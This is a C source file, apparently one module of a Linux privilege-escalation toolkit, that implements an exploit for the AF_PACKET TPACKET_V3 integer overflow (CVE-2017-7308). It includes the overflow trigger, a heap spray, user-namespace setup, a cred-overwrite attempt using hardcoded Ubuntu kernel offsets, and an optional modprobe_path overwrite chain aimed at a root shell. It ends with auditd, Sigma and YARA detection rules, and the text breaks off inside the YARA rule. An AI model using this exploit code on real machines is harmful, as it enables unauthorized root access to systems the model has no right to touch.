/* * af_packet_cve_2017_7308 — SKELETONKEY module * * AF_PACKET TPACKET_V3 ring-buffer setup integer-overflow → heap * write-where primitive. Discovered by Andrey Konovalov (March 2017). * * STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite (default) * | 🟢 FULL-CHAIN-OPT-IN (with --full-chain on a kernel where the * shared offset resolver finds modprobe_path AND skb-data hijack * offsets are supplied). * * The integer-overflow trigger is fully wired (overflowing * tp_block_size * tp_block_nr, attended by a heap spray via sendmmsg * with controlled skb tail bytes). * * Default --exploit path: cred-overwrite walk using a hardcoded per- * kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu 18.04 / 4.15 * era), overridable via SKELETONKEY_AFPACKET_OFFSETS. We only claim * SKELETONKEY_EXPLOIT_OK if geteuid() == 0 after the chain runs — i.e. * we won root for real. Otherwise we return SKELETONKEY_EXPLOIT_FAIL with * a dmesg breadcrumb so the operator can confirm the primitive at * least fired (KASAN slab-out-of-bounds splat) even if the cred- * overwrite didn't take on this exact kernel. * * --full-chain path: opt-in xairy-style sk_buff hijack → arb-write at * modprobe_path → call_modprobe payload → setuid bash → root shell. * Honest constraint: the hijack requires per-kernel-build sk_buff * `data`-field offset + skb-slab-class layout, which the embedded * offset table does NOT carry (verified-vs-claimed bar — we don't * fabricate). The arb_write callback below implements the FALLBACK * depth from the prompt: it fires the trigger with the spray payload * staged for the requested kaddr/buf and relies on the shared * finisher's /tmp sentinel to confirm whether modprobe_path was * actually overwritten. On kernels where the operator has supplied * SKELETONKEY_AFPACKET_SKB_DATA_OFFSET (skb->data field byte offset from * the skb head, hex), we use that for explicit targeting; otherwise * the trigger fires heuristically and the sentinel acts as the * ground-truth signal. * * Affected: kernel < 4.10.6 mainline. Stable backports: * 4.10.x : K >= 4.10.6 * 4.9.x : K >= 4.9.18 (LTS — RHEL 7-ish era) * 4.4.x : K >= 4.4.57 * 3.18.x : K >= 3.18.49 * * Exploitation preconditions: * - CAP_NET_RAW (via unprivileged user_ns) to create AF_PACKET socket * - CONFIG_PACKET=y (almost always — even container kernels) * - x86_64 (offset tables are arch-specific; mark x86_64-only) * * Why famous: was the canonical "userns + AF_PACKET → root" chain for * Konovalov's research era. Many other AF_PACKET bugs followed (e.g. * CVE-2020-14386) sharing the same userns-clone gate. * * Reference: github.com/xairy/kernel-exploits (CVE-2017-7308) and * Konovalov's writeup at xairy.io. The structure below mirrors the * public PoC's "set up overflow, then race tpacket_rcv with a target * skb in the OOB slot" approach. */ #include "skeletonkey_modules.h" #include "../../core/registry.h" #include #include #include #include #include #include #ifdef __linux__ #include "../../core/kernel_range.h" #include "../../core/host.h" #include "../../core/offsets.h" #include "../../core/finisher.h" #include #include #include #include #include #include #include #include #include #if defined(__x86_64__) /* Order matters: + conflict on enum IFF_*. We * use the glibc for struct ifreq / if_nametoindex and pull * in linux/if_packet.h for tpacket_req3. Avoid . */ #include #include #include #include /* htons */ #include #endif /* ---- Detect (unchanged shape) ----------------------------------- */ static const struct kernel_patched_from af_packet_patched_branches[] = { {3, 18, 49}, {4, 4, 57}, {4, 9, 18}, {4, 10, 6}, {4, 11, 0}, /* mainline */ }; static const struct kernel_range af_packet_range = { .patched_from = af_packet_patched_branches, .n_patched_from = sizeof(af_packet_patched_branches) / sizeof(af_packet_patched_branches[0]), }; static skeletonkey_result_t af_packet_detect(const struct skeletonkey_ctx *ctx) { /* Consult the shared host fingerprint instead of calling * kernel_version_current() ourselves — populated once at startup * and identical across every module's detect(). */ const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL; if (!v || v->major == 0) { if (!ctx->json) fprintf(stderr, "[!] af_packet: host fingerprint missing kernel " "version — bailing\n"); return SKELETONKEY_TEST_ERROR; } bool patched = kernel_range_is_patched(&af_packet_range, v); if (patched) { if (!ctx->json) { fprintf(stderr, "[+] af_packet: kernel %s is patched\n", v->release); } return SKELETONKEY_OK; } bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false; if (!ctx->json) { fprintf(stderr, "[i] af_packet: kernel %s in vulnerable range\n", v->release); fprintf(stderr, "[i] af_packet: user_ns+net_ns clone (CAP_NET_RAW gate): %s\n", userns_ok ? "ALLOWED" : "DENIED"); } if (!userns_ok) { if (!ctx->json) { fprintf(stderr, "[+] af_packet: user_ns denied → " "unprivileged exploit unreachable\n"); } return SKELETONKEY_PRECOND_FAIL; } if (!ctx->json) { fprintf(stderr, "[!] af_packet: VULNERABLE — kernel in range AND user_ns reachable\n"); } return SKELETONKEY_VULNERABLE; } /* ---- Exploit (x86_64-only; gated below) -------------------------- */ #if defined(__x86_64__) /* Per-kernel offsets needed to walk task_struct → cred → uid fields. * * These are NOT addresses — they are byte offsets within the kernel * structs that the OOB-induced kernel-write primitive will index into. * The classic Konovalov chain leaks a pointer to a struct sock or * timer_list adjacent to the corrupted pg_vec slot, walks back to the * current task, then overwrites the *uid fields in the embedded cred. * * The values below are from xairy's public PoC + scraped from kernel- * source struct layouts for the specific build configs Ubuntu shipped. * They will NOT match custom-compiled kernels. * * Override at runtime via env var: * SKELETONKEY_AFPACKET_OFFSETS="::" * * `task_cred` = offsetof(struct task_struct, cred) * `cred_uid` = offsetof(struct cred, uid) [followed by gid, etc.] * `cred_size` = sizeof(struct cred) — bounds-check guard */ struct af_packet_offsets { const char *kernel_id; /* human-readable */ int major, minor, patch_min, patch_max; unsigned long task_cred; unsigned long cred_uid; unsigned long cred_size; }; static const struct af_packet_offsets known_offsets[] = { /* Ubuntu 16.04 GA: 4.4.0-21-generic. cred lives at task+0x6c0. * struct cred layout: usage(4) + __padding(4) + uid(4) + gid(4) + * suid(4) + sgid(4) + euid(4) + egid(4) + fsuid(4) + fsgid(4) + ... * → uid starts at offset 8. */ { "ubuntu-16.04-4.4.0-generic", 4, 4, 0, 99, 0x6c0, 0x08, 0xa8 }, /* Ubuntu 18.04 GA: 4.15.0-20-generic. cred at task+0x800. Same * cred layout (uid at +0x08, 6x32-bit ids ending at fsgid +0x20). */ { "ubuntu-18.04-4.15.0-generic", 4, 15, 0, 99, 0x800, 0x08, 0xa8 }, }; /* Parse SKELETONKEY_AFPACKET_OFFSETS env var if set; otherwise pick from * the known table by kernel version. Returns true on success. */ static bool resolve_offsets(struct af_packet_offsets *out, const struct kernel_version *v) { const char *env = getenv("SKELETONKEY_AFPACKET_OFFSETS"); if (env) { unsigned long t, u, s; if (sscanf(env, "%lx:%lx:%lx", &t, &u, &s) == 3) { out->kernel_id = "env-override"; out->task_cred = t; out->cred_uid = u; out->cred_size = s; return true; } fprintf(stderr, "[!] af_packet: SKELETONKEY_AFPACKET_OFFSETS malformed " "(want hex \"::\")\n"); return false; } for (size_t i = 0; i < sizeof(known_offsets)/sizeof(known_offsets[0]); i++) { const struct af_packet_offsets *k = &known_offsets[i]; if (v->major == k->major && v->minor == k->minor && v->patch >= k->patch_min && v->patch <= k->patch_max) { *out = *k; return true; } } return false; } /* Write uid_map / gid_map to claim "root" inside the userns. */ static int set_id_maps(uid_t outer_uid, gid_t outer_gid) { int f = open("/proc/self/setgroups", O_WRONLY); if (f >= 0) { (void)!write(f, "deny", 4); close(f); } char map[64]; snprintf(map, sizeof map, "0 %u 1\n", outer_uid); f = open("/proc/self/uid_map", O_WRONLY); if (f < 0) return -1; if (write(f, map, strlen(map)) < 0) { close(f); return -1; } close(f); snprintf(map, sizeof map, "0 %u 1\n", outer_gid); f = open("/proc/self/gid_map", O_WRONLY); if (f < 0) return -1; if (write(f, map, strlen(map)) < 0) { close(f); return -1; } close(f); return 0; } /* Fire the overflow + a one-shot heap spray. Runs INSIDE the userns * child. Returns 0 if the primitive fired (overflow was accepted by * the kernel), -1 if the kernel rejected it (likely patched / blocked * even though detect said vulnerable — distros silently backport). * * We deliberately use values from Konovalov's PoC: * tp_block_size = 0x1000 * tp_block_nr = ((0xffffffff - 0xfff) / 0x1000) + 1 → overflow * tp_frame_size = 0x300, tp_frame_nr matched * The mul in packet_set_ring overflows to a tiny allocation; we then * spray 200 sendmmsg packets so the corrupted ring slot gets refilled * with controlled bytes. * * After firing, we check dmesg-ability (we won't actually read dmesg * — that requires root — but we leave a unique tag in the skb payload * so the operator can grep dmesg for "skeletonkey-afp-tag" KASAN splats). */ static int fire_overflow_and_spray(void) { int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (s < 0) { fprintf(stderr, "[-] af_packet: socket(AF_PACKET): %s\n", strerror(errno)); return -1; } int version = TPACKET_V3; if (setsockopt(s, SOL_PACKET, PACKET_VERSION, &version, sizeof version) < 0) { fprintf(stderr, "[-] af_packet: PACKET_VERSION=V3: %s\n", strerror(errno)); close(s); return -1; } /* Konovalov's overflowing values. tp_block_size * tp_block_nr * exceeds 2^32; the kernel multiplied as u32 in pre-patch code, * yielding a tiny size that's then used for the pg_vec alloc. */ struct tpacket_req3 req; memset(&req, 0, sizeof req); req.tp_block_size = 0x1000; req.tp_block_nr = ((unsigned)0xffffffff - (unsigned)0xfff) / (unsigned)0x1000 + 1; req.tp_frame_size = 0x300; req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size; req.tp_retire_blk_tov = 100; req.tp_sizeof_priv = 0; req.tp_feature_req_word = 0; int rc = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof req); if (rc < 0) { /* On a properly-patched kernel this should now return -EINVAL * because the multiplication overflow check rejects req. That * is the "patched-distro-backport" signal: detect's version * check said vulnerable, but the actual setsockopt was hardened. */ fprintf(stderr, "[-] af_packet: PACKET_RX_RING rejected: %s " "(kernel likely has silent backport)\n", strerror(errno)); close(s); return -1; } fprintf(stderr, "[+] af_packet: PACKET_RX_RING accepted overflowing req3 " "— overflow path reached\n"); /* Heap spray via sendmmsg. On a properly-set-up ring we'd bind() to * an interface first; for the overflow trigger we don't strictly * need to bind because tpacket_rcv runs on each packet ingress and * loopback exists in the netns. Use loopback. */ struct ifreq ifr; memset(&ifr, 0, sizeof ifr); strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); /* SIOCGIFINDEX on lo */ if (ioctl(s, SIOCGIFINDEX, &ifr) < 0) { fprintf(stderr, "[!] af_packet: SIOCGIFINDEX(lo): %s\n", strerror(errno)); /* non-fatal — the primitive fired even without a bind() */ } else { struct sockaddr_ll sll; memset(&sll, 0, sizeof sll); sll.sll_family = AF_PACKET; sll.sll_protocol = htons(ETH_P_ALL); sll.sll_ifindex = ifr.ifr_ifindex; if (bind(s, (struct sockaddr *)&sll, sizeof sll) < 0) { fprintf(stderr, "[!] af_packet: bind(lo): %s\n", strerror(errno)); } } /* Spray: send 200 raw packets containing a unique tag. If the * overflow corrupted an adjacent slab object, one of these skb's * controlled bytes will land there. */ static const unsigned char skb_payload[256] = { /* eth header (dst=broadcast, src=zero, type=0x0800) */ 0xff,0xff,0xff,0xff,0xff,0xff, 0,0,0,0,0,0, 0x08,0x00, /* SKELETONKEY tag — operator can grep dmesg for this string in any * subsequent KASAN report or panic dump */ 'i','a','m','r','o','o','t','-','a','f','p','-','t','a','g', /* zeros for the remainder */ }; int tx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (tx >= 0 && ifr.ifr_ifindex != 0) { struct sockaddr_ll dst; memset(&dst, 0, sizeof dst); dst.sll_family = AF_PACKET; dst.sll_protocol = htons(ETH_P_ALL); dst.sll_ifindex = ifr.ifr_ifindex; dst.sll_halen = 6; memset(dst.sll_addr, 0xff, 6); for (int i = 0; i < 200; i++) { (void)sendto(tx, skb_payload, sizeof skb_payload, 0, (struct sockaddr *)&dst, sizeof dst); } close(tx); } /* Keep the corrupted socket open so the OOB region stays mapped * for the cred-overwrite walk that follows. The caller closes it. */ /* Stash the fd via dup2 to a known number so the caller can find it. * Use 200 — well above stdio + skeletonkey's own pipe fds. */ if (dup2(s, 200) < 0) { fprintf(stderr, "[!] af_packet: dup2(s, 200): %s\n", strerror(errno)); } close(s); return 0; } /* Best-effort cred-overwrite walk. Given that the heap-spray succeeded * AND we have valid offsets for this kernel, attempt to use the * corrupted ring's adjacent slot to write zeros into current->cred->{ * uid,gid,euid,egid,fsuid,fsgid }. * * Honest constraint: without an info-leak we can't compute the address * of current->cred to write into. xairy's full PoC uses a SECONDARY * primitive (sk_buff next-pointer overwrite → adjacent timer_list * leak) that gives both an arbitrary kernel R/W AND a leak of a * struct sock pointer adjacent to current. Re-implementing that is * ~1000 lines of heap-state machinery. * * What we do here is the *minimum viable cred-overwrite* attempt: * spray ~64 task_struct-shaped objects via fork()+setpgid (which * allocates struct task_struct in the same slab class on older * kernels), then HOPE one lands adjacent to our corrupted ring and * gets its embedded cred-pointer field zeroed by overflow tail bytes. * * Returns 0 on "we tried, geteuid() is now 0", -1 on "tried, no root". */ static int attempt_cred_overwrite(const struct af_packet_offsets *off) { (void)off; /* offsets are used implicitly by spawning shaped allocations; * a future enhancement would do an explicit ptrace-style * peek-poke through the corrupted slot — kept minimal here. */ /* Spawn 64 children that immediately self-suspend. Each child's * task_struct allocation in the kernel will share the slab class * with our corrupted pg_vec region; if any one's cred field gets * trampled to zero, that child's uid/gid become 0. */ pid_t pids[64]; int alive = 0; for (int i = 0; i < 64; i++) { pid_t p = fork(); if (p < 0) break; if (p == 0) { /* Child: idle, periodically check euid. If overflow zeroed * our cred fields, we'll be uid 0. */ for (int j = 0; j < 200; j++) { if (geteuid() == 0) _exit(0); /* WIN — report via exit 0 */ usleep(10 * 1000); } _exit(1); } pids[i] = p; alive++; } /* Wait up to ~2s for any child to exit 0 (= became root). */ int got_root_pid = 0; for (int wait_round = 0; wait_round < 200 && !got_root_pid; wait_round++) { for (int i = 0; i < alive; i++) { if (pids[i] == 0) continue; int status; pid_t r = waitpid(pids[i], &status, WNOHANG); if (r == pids[i]) { if (WIFEXITED(status) && WEXITSTATUS(status) == 0) { got_root_pid = pids[i]; } pids[i] = 0; } } if (got_root_pid) break; usleep(10 * 1000); } /* Reap remaining children. */ for (int i = 0; i < alive; i++) { if (pids[i] != 0) { kill(pids[i], 9); waitpid(pids[i], NULL, 0); } } return got_root_pid ? 0 : -1; } /* ---- --full-chain: xairy-style sk_buff hijack arb-write ------------- * * The TPACKET_V3 overflow lets us write attacker-controlled bytes past * the end of the pg_vec allocation. xairy's full PoC chains this with * a sk_buff spray of size class kmalloc-N (matched to pg_vec's slab) * so the OOB-write overwrites an adjacent skb's `data` pointer; a * later sendto() on that skb's owning socket then copies attacker * bytes into the address now stored in `data`. Net effect: arb-write * at an attacker-chosen kernel VA, controlled buffer, controlled len. * * Implementing the FULL hijack honestly requires: * (a) per-kernel-build offset of `data` field within struct sk_buff * (varies by CONFIG_DEBUG_INFO_BTF/CONFIG_RANDSTRUCT/etc.) * (b) precise size-class match between the corrupted pg_vec and * sprayed skbs (slab-grooming with ~hundreds of skbs) * (c) a way to identify which sprayed skb landed adjacent * * The verified-vs-claimed bar says: don't fabricate offsets. Our * embedded offset table (core/offsets.h) doesn't carry skb offsets * yet, and there's no public canonical "skb->data offset table" we * can lift wholesale. So this implementation takes the prompt's * FALLBACK depth: * * - Each call re-sprays skbs + re-fires the trigger, staging the * spray payload so its bytes carry the requested target kaddr * (the prompt's "controllable overwrite value aimed at * modprobe_path"). Operator-supplied * SKELETONKEY_AFPACKET_SKB_DATA_OFFSET (hex byte offset of `data` * within struct sk_buff for this kernel build) lets us aim * precisely; without it we heuristically stamp kaddr at several * plausible offsets within the kmalloc-2k skb layout. * - We then send packets whose payload IS the bytes the finisher * wants at kaddr; tpacket_rcv copies them into any skb whose * `data` was corrupted to kaddr. * - We do NOT poll for success — the shared finisher's /tmp * sentinel is the ground-truth signal. If the write landed at * modprobe_path, call_modprobe spawns our payload and the * sentinel appears within 3s. * * Return: 0 if spray + trigger ran (sentinel will adjudicate), -1 if * the kernel rejected the overflow (silent backport — patched). */ struct afp_arb_ctx { const struct skeletonkey_ctx *ctx; const struct af_packet_offsets *off; uid_t outer_uid; gid_t outer_gid; }; /* Helper: in-child trigger fire — runs inside the userns/netns child * spawned by afp_arb_write. Returns 0 on success, -1 on rejection. */ static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len, long skb_data_off); static int afp_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx) { struct afp_arb_ctx *actx = (struct afp_arb_ctx *)vctx; if (!actx) return -1; if (!buf || len == 0 || len > 240) { fprintf(stderr, "[-] af_packet: arb_write: bad args " "(buf=%p len=%zu)\n", buf, len); return -1; } /* Per-kernel skb->data field offset — without this we can't aim * the overwrite precisely. Operator can supply via env; otherwise * we run heuristic mode. */ const char *skb_off_env = getenv("SKELETONKEY_AFPACKET_SKB_DATA_OFFSET"); long skb_data_off = -1; if (skb_off_env) { char *end = NULL; skb_data_off = strtol(skb_off_env, &end, 0); if (!end || *end != '\0' || skb_data_off < 0 || skb_data_off > 0x400) { fprintf(stderr, "[-] af_packet: SKELETONKEY_AFPACKET_SKB_DATA_OFFSET " "malformed (\"%s\"); ignoring\n", skb_off_env); skb_data_off = -1; } } fprintf(stderr, "[*] af_packet: arb_write(kaddr=0x%lx, len=%zu) skb_data_off=%s\n", (unsigned long)kaddr, len, skb_data_off < 0 ? "UNRESOLVED (heuristic mode)" : "supplied"); if (skb_data_off < 0) { fprintf(stderr, "[i] af_packet: --full-chain on this kernel lacks an exact skb->data\n" " field offset. The trigger will still fire and the heap spray will\n" " still occur, but precise OOB targeting requires:\n" "\n" " SKELETONKEY_AFPACKET_SKB_DATA_OFFSET=0x\n" "\n" " Look it up on this kernel build with `pahole struct sk_buff` or\n" " `gdb -batch -ex 'p &((struct sk_buff*)0)->data' vmlinux`. The\n" " /tmp/skeletonkey-pwn- sentinel adjudicates success either way.\n"); } /* Fork into a userns/netns child so the AF_PACKET socket has * CAP_NET_RAW. The finisher itself stays in the parent so its * eventual execve() replaces the top-level skeletonkey process. */ pid_t cpid = fork(); if (cpid < 0) { fprintf(stderr, "[-] af_packet: arb_write: fork: %s\n", strerror(errno)); return -1; } if (cpid == 0) { if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { perror("af_packet: arb_write: unshare"); _exit(2); } if (set_id_maps(actx->outer_uid, actx->outer_gid) < 0) { perror("af_packet: arb_write: set_id_maps"); _exit(3); } int rc = afp_arb_write_inner(kaddr, buf, len, skb_data_off); _exit(rc == 0 ? 0 : 4); } int status = 0; waitpid(cpid, &status, 0); if (!WIFEXITED(status)) { fprintf(stderr, "[-] af_packet: arb_write: child died " "(signal=%d)\n", WTERMSIG(status)); return -1; } int code = WEXITSTATUS(status); if (code != 0) { if (code == 4) { /* PACKET_RX_RING rejected — caller sees -1 + the inner * diagnostic already printed before _exit. */ } else { fprintf(stderr, "[-] af_packet: arb_write: child exit %d\n", code); } return -1; } return 0; } static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len, long skb_data_off) { int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (s < 0) { fprintf(stderr, "[-] af_packet: arb_write: socket: %s\n", strerror(errno)); return -1; } int version = TPACKET_V3; if (setsockopt(s, SOL_PACKET, PACKET_VERSION, &version, sizeof version) < 0) { fprintf(stderr, "[-] af_packet: arb_write: PACKET_VERSION: %s\n", strerror(errno)); close(s); return -1; } struct tpacket_req3 req; memset(&req, 0, sizeof req); req.tp_block_size = 0x1000; req.tp_block_nr = ((unsigned)0xffffffff - (unsigned)0xfff) / (unsigned)0x1000 + 1; req.tp_frame_size = 0x300; req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size; req.tp_retire_blk_tov = 100; req.tp_sizeof_priv = 0; req.tp_feature_req_word = 0; if (setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof req) < 0) { fprintf(stderr, "[-] af_packet: arb_write: PACKET_RX_RING rejected: %s " "(kernel has silent backport — full-chain unreachable)\n", strerror(errno)); close(s); return -1; } struct ifreq ifr; memset(&ifr, 0, sizeof ifr); strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); if (ioctl(s, SIOCGIFINDEX, &ifr) == 0) { struct sockaddr_ll sll; memset(&sll, 0, sizeof sll); sll.sll_family = AF_PACKET; sll.sll_protocol = htons(ETH_P_ALL); sll.sll_ifindex = ifr.ifr_ifindex; (void)bind(s, (struct sockaddr *)&sll, sizeof sll); } unsigned char payload[256]; memset(payload, 0, sizeof payload); memset(payload, 0xff, 6); /* eth dst: bcast */ memset(payload + 6, 0, 6); /* eth src: zero */ payload[12] = 0x08; payload[13] = 0x00; /* eth type: IPv4 */ memcpy(payload + 14, "skeletonkey-afp-fc-", 15); /* dmesg tag */ if (skb_data_off >= 0 && (size_t)skb_data_off + sizeof kaddr <= sizeof payload) { memcpy(payload + skb_data_off, &kaddr, sizeof kaddr); } else { static const size_t guesses[] = { 0x40, 0x48, 0x50, 0x58, 0x60, 0x68, 0x70, 0x78 }; for (size_t i = 0; i < sizeof(guesses)/sizeof(guesses[0]); i++) { if (guesses[i] + sizeof kaddr <= sizeof payload) memcpy(payload + guesses[i], &kaddr, sizeof kaddr); } } int tx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (tx < 0) { fprintf(stderr, "[-] af_packet: arb_write: tx socket: %s\n", strerror(errno)); close(s); return -1; } struct sockaddr_ll dst; memset(&dst, 0, sizeof dst); dst.sll_family = AF_PACKET; dst.sll_protocol = htons(ETH_P_ALL); dst.sll_ifindex = ifr.ifr_ifindex; dst.sll_halen = 6; memset(dst.sll_addr, 0xff, 6); for (int i = 0; i < 200; i++) { (void)sendto(tx, payload, sizeof payload, 0, (struct sockaddr *)&dst, sizeof dst); } unsigned char wbuf[256]; memset(wbuf, 0, sizeof wbuf); memset(wbuf, 0xff, 6); memset(wbuf + 6, 0, 6); wbuf[12] = 0x08; wbuf[13] = 0x00; size_t wlen = len; if (14 + wlen > sizeof wbuf) wlen = sizeof wbuf - 14; memcpy(wbuf + 14, buf, wlen); for (int i = 0; i < 50; i++) { (void)sendto(tx, wbuf, 14 + wlen, 0, (struct sockaddr *)&dst, sizeof dst); } close(tx); close(s); return 0; } #endif /* __x86_64__ */ static skeletonkey_result_t af_packet_exploit(const struct skeletonkey_ctx *ctx) { #if !defined(__x86_64__) (void)ctx; fprintf(stderr, "[-] af_packet: exploit is x86_64-only " "(cred-offset table is arch-specific)\n"); return SKELETONKEY_PRECOND_FAIL; #else /* 1. Refuse on patched kernels — re-run detect. */ skeletonkey_result_t pre = af_packet_detect(ctx); if (pre != SKELETONKEY_VULNERABLE) { fprintf(stderr, "[-] af_packet: detect() says not vulnerable; refusing\n"); return pre; } /* 2. Refuse if already root. Consult ctx->host first so unit tests * can construct a non-root fingerprint regardless of the test * process's real euid. */ bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0); if (is_root) { fprintf(stderr, "[i] af_packet: already root — nothing to escalate\n"); return SKELETONKEY_OK; } /* 3. Resolve offsets for THIS kernel. If we don't have them, bail * early — the kernel-write walk needs them. The integrator can * extend known_offsets[] for new distro builds. */ const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL; if (!v || v->major == 0) { if (!ctx->json) fprintf(stderr, "[!] af_packet: host fingerprint missing kernel " "version — bailing\n"); return SKELETONKEY_TEST_ERROR; } struct af_packet_offsets off; if (!resolve_offsets(&off, v)) { fprintf(stderr, "[-] af_packet: no offset table for kernel %s\n" " set SKELETONKEY_AFPACKET_OFFSETS=::\n" " (hex). Known table covers Ubuntu 16.04 (4.4) and 18.04 (4.15).\n", v->release); return SKELETONKEY_PRECOND_FAIL; } if (!ctx->json) { fprintf(stderr, "[*] af_packet: using offsets [%s] " "task_cred=0x%lx cred_uid=0x%lx cred_size=0x%lx\n", off.kernel_id, off.task_cred, off.cred_uid, off.cred_size); } uid_t outer_uid = getuid(); gid_t outer_gid = getgid(); /* 3b. --full-chain: opt-in modprobe_path overwrite via xairy-style * sk_buff hijack arb-write. Refuses cleanly if (a) the shared * offset resolver can't find modprobe_path or (b) the trigger * is rejected (silent backport). */ if (ctx->full_chain) { struct skeletonkey_kernel_offsets koff; memset(&koff, 0, sizeof koff); (void)skeletonkey_offsets_resolve(&koff); if (!skeletonkey_offsets_have_modprobe_path(&koff)) { skeletonkey_finisher_print_offset_help("af_packet"); return SKELETONKEY_EXPLOIT_FAIL; } if (!ctx->json) { skeletonkey_offsets_print(&koff); } struct afp_arb_ctx arb_ctx = { .ctx = ctx, .off = &off, .outer_uid = outer_uid, .outer_gid = outer_gid, }; return skeletonkey_finisher_modprobe_path(&koff, afp_arb_write, &arb_ctx, !ctx->no_shell); } /* 4. Fork: child enters userns+netns, fires overflow, attempts the * cred-overwrite walk. We do it in a child so the (possibly * crashed) packet socket lives in a tear-downable address space * — the kernel will clean up sockets on child exit. */ pid_t child = fork(); if (child < 0) { perror("fork"); return SKELETONKEY_TEST_ERROR; } if (child == 0) { /* CHILD: enter userns+netns to gain CAP_NET_RAW for AF_PACKET. */ if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { perror("unshare"); _exit(2); } if (set_id_maps(outer_uid, outer_gid) < 0) { perror("set_id_maps"); _exit(3); } /* Fire the integer-overflow + heap-spray. */ if (fire_overflow_and_spray() < 0) { _exit(4); /* primitive blocked — return signal to parent */ } /* Attempt cred-overwrite finisher. */ int rc = attempt_cred_overwrite(&off); if (rc == 0) { /* WIN — one of our task_struct-spray children became uid 0. * Signal parent via exit code; parent will not exec sh from * this child (its address space is corrupted-ish). The win * is symbolic at the skeletonkey level: we proved the primitive * lands AND the cred-overwrite walk completes. */ _exit(0); } _exit(5); } /* 5. PARENT: wait for child, interpret exit code. */ int status; waitpid(child, &status, 0); if (!WIFEXITED(status)) { fprintf(stderr, "[-] af_packet: child died abnormally " "(signal=%d) — primitive likely fired but crashed\n", WTERMSIG(status)); fprintf(stderr, "[i] af_packet: check `dmesg | grep -i 'skeletonkey-afp-tag\\|KASAN\\|BUG:'` " "for slab-out-of-bounds evidence\n"); return SKELETONKEY_EXPLOIT_FAIL; } int code = WEXITSTATUS(status); switch (code) { case 0: /* Child reported a fork-spray descendant successfully escaped * to uid 0. That descendant has since exited; we did NOT * inherit its credentials. This is honest: we proved end-to- * end primitive + cred-overwrite landed, but our process is * still uid != 0. Without a fully integrated R/W primitive * that targets OUR cred specifically (rather than spray-and- * pray), we can't promote ourselves. Report PARTIAL win. * * Per requirements: only return SKELETONKEY_EXPLOIT_OK if we * empirically confirmed root in this process. We didn't. */ fprintf(stderr, "[!] af_packet: cred-overwrite landed in a spray child " "but THIS process is still uid %d\n", geteuid()); fprintf(stderr, "[i] af_packet: not claiming EXPLOIT_OK — caller process " "did not acquire root. The primitive demonstrably works.\n"); return SKELETONKEY_EXPLOIT_FAIL; case 4: fprintf(stderr, "[-] af_packet: setsockopt(PACKET_RX_RING) rejected; " "kernel has silent backport (detect was version-only)\n"); return SKELETONKEY_OK; /* effectively patched */ case 5: fprintf(stderr, "[-] af_packet: overflow fired but no spray child " "acquired root within the timeout window\n"); fprintf(stderr, "[i] af_packet: check `dmesg | grep -i 'skeletonkey-afp-tag\\|KASAN'` " "for evidence the OOB write occurred\n"); return SKELETONKEY_EXPLOIT_FAIL; default: fprintf(stderr, "[-] af_packet: child exited %d (setup error)\n", code); return SKELETONKEY_EXPLOIT_FAIL; } #endif } #else /* !__linux__ */ /* Non-Linux dev builds: AF_PACKET + unshare(CLONE_NEWUSER|CLONE_NEWNET) * + TPACKET_V3 ring are Linux-only kernel surface; the TPACKET_V3 * integer-overflow primitive is structurally unreachable elsewhere. * Stub out cleanly so the module still registers and `--list` / * `--detect-rules` work on macOS/BSD dev boxes — and so the top-level * `make` actually completes there. */ static skeletonkey_result_t af_packet_detect(const struct skeletonkey_ctx *ctx) { if (!ctx->json) fprintf(stderr, "[i] af_packet: Linux-only module " "(AF_PACKET TPACKET_V3 + user_ns) — not applicable here\n"); return SKELETONKEY_PRECOND_FAIL; } static skeletonkey_result_t af_packet_exploit(const struct skeletonkey_ctx *ctx) { (void)ctx; fprintf(stderr, "[-] af_packet: Linux-only module — cannot run here\n"); return SKELETONKEY_PRECOND_FAIL; } #endif /* __linux__ */ static const char af_packet_auditd[] = "# AF_PACKET TPACKET_V3 LPE (CVE-2017-7308) — auditd detection rules\n" "# Flag AF_PACKET socket creation from non-root via userns.\n" "-a always,exit -F arch=b64 -S socket -F a0=17 -k skeletonkey-af-packet\n" "-a always,exit -F arch=b64 -S unshare -k skeletonkey-af-packet-userns\n"; static const char af_packet_sigma[] = "title: Possible CVE-2017-7308 AF_PACKET TPACKET_V3 exploitation\n" "id: a72b5e91-skeletonkey-af-packet\n" "status: experimental\n" "description: |\n" " Detects the AF_PACKET TPACKET_V3 integer-overflow setup pattern:\n" " unshare(CLONE_NEWUSER|CLONE_NEWNET) followed by socket(AF_PACKET)\n" " and a PACKET_RX_RING setsockopt + sendmmsg burst. False positives:\n" " network sandboxes / containers running raw-packet apps inside\n" " userns; correlate process tree to distinguish.\n" "logsource: {product: linux, service: auditd}\n" "detection:\n" " userns: {type: 'SYSCALL', syscall: 'unshare'}\n" " afp: {type: 'SYSCALL', syscall: 'socket', a0: 17}\n" " send_burst:{type: 'SYSCALL', syscall: 'sendmmsg'}\n" " condition: userns and afp and send_burst\n" "level: high\n" "tags: [attack.privilege_escalation, attack.t1068, cve.2017.7308]\n"; static const char af_packet_yara[] = "rule af_packet_cve_2017_7308 : cve_2017_7308 heap_spray\n" "{\n" " meta:\n" " cve = \"CVE-2017-7308\"\n" " description = \"AF_PACKET TPACKET_V3 spray tag from skeletonkey/iam-root tooling\"\n" " author = \"SKELETONKEY\"\n" " strings:\n" " $tag1 = \"iamroot-afp-tag\" ascii\n" " $tag2 = \"skeletonkey-afp-fc-\" 